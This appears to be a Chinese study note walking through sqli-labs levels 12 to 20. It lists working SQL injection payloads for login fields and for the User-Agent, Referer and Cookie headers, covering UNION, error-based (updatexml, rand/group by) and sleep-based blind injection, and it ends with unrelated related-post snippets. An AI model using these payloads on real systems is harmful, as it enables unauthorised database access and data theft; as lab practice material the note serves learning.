less12-less20()
总结
user_agent注入
referer注入
cookie注入
updatexml()报错注入
less12
用户名密码输入
a") or ("1"="1
得到一个账户Dumb、Dumb。
用户名密码处分别输入计算出行数
Dumb") and ("1"="1
Dumb") and 1=1 order by 2--
输入
Dumb") and ("1"="2
Dumb") and 1=2 union select 1,2--
输入
Dumb") and ("1"="2
Dumb") and 1=2 union select @@version,2--
less13
因为页面无回显,所以采用报错注入。
- 用户名密码输入
7') or ('1')=('1
7') or 1=1 order by 2--
7') or ('1')=('1
7') or 1=1 union select concat(left(rand(),3),'>',@@version),count(*) from information_schema.tables group by 1-- `
less14
双引号
1.
7" or "1"="1
7" or 1=1 order by 2--
7" or "1"="1
7" or 1=1 union select concat(left(rand(),3),'>',@@version),count(*) from information_schema.tables group by 1--
less15
123
1' or 1=1 and sleep(5)--
2.得到数据库长度
//用户名处输入任意数
1' or 1=1 and if(length(database())>1,sleep(5),1)--
less16
1") or 1=1 order by 2--
1") or length(database())>0--
less17()
Dumb
Dumb' and updatexml(1,concat('>',database(),'>'),1)--
less18()
user_agent注入
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
less19##
referer注入
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
less20
cookie注入
uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#
less12-less20()相关推荐
- python 替换字符串的方法replace()、正则re.sub()
一.replace()函数 1用字符串本身的replace方法: a = 'hello word' b = a.replace('word','python') print b 1 2 3 二.re. ...
- Scrapy 学习笔记(-)
Scrapy Scrapy 是一个为了爬取网站数据,提取结构性数据而编写的应用框架. 其可以应用在数据挖掘,信息处理或存储历史数据等一系列的程序中.其最初是为了页面抓取 (更确切来说, 网络抓取 )所 ...
- 67)vector的begin() end() 和 front() back()的区别 rbegin() rend()
1) ·············· 2)`````````v1.begin() 和v1.end() 是作为迭代器v1的 第一个位置 和 最后一个元素的下一个位置. `````````````v1. ...
- 转:【CSS/JS学习】如何实现单行/多行文本溢出的省略(...)--老司机绕过坑道的正确姿势...
本文来源:http://www.cnblogs.com/penghuwan/p/6682303.html 引言: 写前端UI的朋友们也许都遇到过这样的问题:我们需要实现这样一个需求,在一个父级元素中隐 ...
- Python中的对象,类,super()函数
对象:(1)外观的特征 (2)正在做的事情 比如:那个穿蓝色衣服的正在打球的帅哥 类:属性(静态的变量)+方法(函数)是对对象的近似 类名约定是以大写字母开始的 类的出现: 是为了使得对象可以进行大 ...
- Python中的super()函数
多路继承的问题 描述: 解决这样的问题Python中可以使用super() super()函数有点: (1)在父类中可以直接的调用未绑定的方法 (2)在确保所有的父类的构造方法都使用了super()函 ...
- 函数assert()详解
函数assert()详解: 断言assert是一个宏,该宏在<assert>中,,当使用assert时候,给他个参数,即一个判读为真的表达式.预处理器产生测试该断言的代码,如果断言不为真, ...
- 若显示器接口电路中的刷新存储器容量为1MB,当采用800*600的分辨率模式时,每个像素最多可以有多少()种颜色
若显示器接口电路中的刷新存储器容量为1MB,当采用800*600的分辨率模式时,每个像素最多可以有多少()种颜色. 显示内存 >= 分辨率与彩色位数/8的乘积 1MB=800*600*T: T= ...
- 下面算法中,不属于公开密钥加密算法的是()。D
下面算法中,不属于公开密钥加密算法的是().D A.ECC B.DSA C.RSA D.DES 常用的公钥加密算法有RSA.DSA.ElGamal和ECC. 常用的对称加密算法有DES.3DES.ID ...
最新文章
- Performance Metrics for Binary Classification
- 北京租房一个月多少钱?数据带你了解北京8月各区租金情况
- Linux驱动编程 step-by-step (十一)
- Linux磁盘分区及要求
- 手把手带你手写SpringMVC,剑指优秀开源框架灵魂
- 摄影软件“留拍”开发现状与过程遇到的困难
- SQL:postgresql中,将geometry转换为geojson数据
- 《你的知识需要管理》序:五步打造个人知识力
- C++ 对象间通信框架 V2.0 ××××××× 之(五)
- 手机框架_移动端框架_跨平台_汇总_哪个好
- AI在医疗领域的应用 | “AI+传统行业”全盘点
- layui分页样式改变
- Java随笔记 - 断包和粘包 解决方法
- 《新神榜:杨戬》亮点抢先看!追光新神话宇宙再添超燃国风巨作
- IT行业的哪些岗位比较有前途?
- 目标检测网络的介绍及应用(一) -- 目标检测任务
- 2022年100家公司真实的面试题笔试题汇总
- Git报错解决:remote: error: File:1f6cc8452313 157.10 MB, exceeds 100.00 MB
- 无边框透明窗口设置鼠标穿透与不穿透功能
- Emgu CV4图像处理之ROI与mask掩码10(C#)